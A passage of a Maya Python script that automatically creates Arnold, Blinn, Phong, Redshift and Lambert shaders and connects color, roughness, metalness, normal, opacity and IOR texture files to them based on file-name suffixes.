connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == phong:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial — also sets refl_brdf (GGX default) on color/roughness and
# refl_fresnel_mode=2 (metalness workflow) on metal hits.
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == redshift:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
roughness_func2('.refl_roughness')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
#lambert — color/normal/opacity only.
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == lambert:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
else:
# The default shader's node type matched none of the supported renderers.
cmds.warning('Please select your file(s) and a shader.')
# First Directory
for i in directory:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + i, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
#Arnold
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == arnold:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == blinn:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == phong:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == redshift:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
#lambert
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == lambert:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
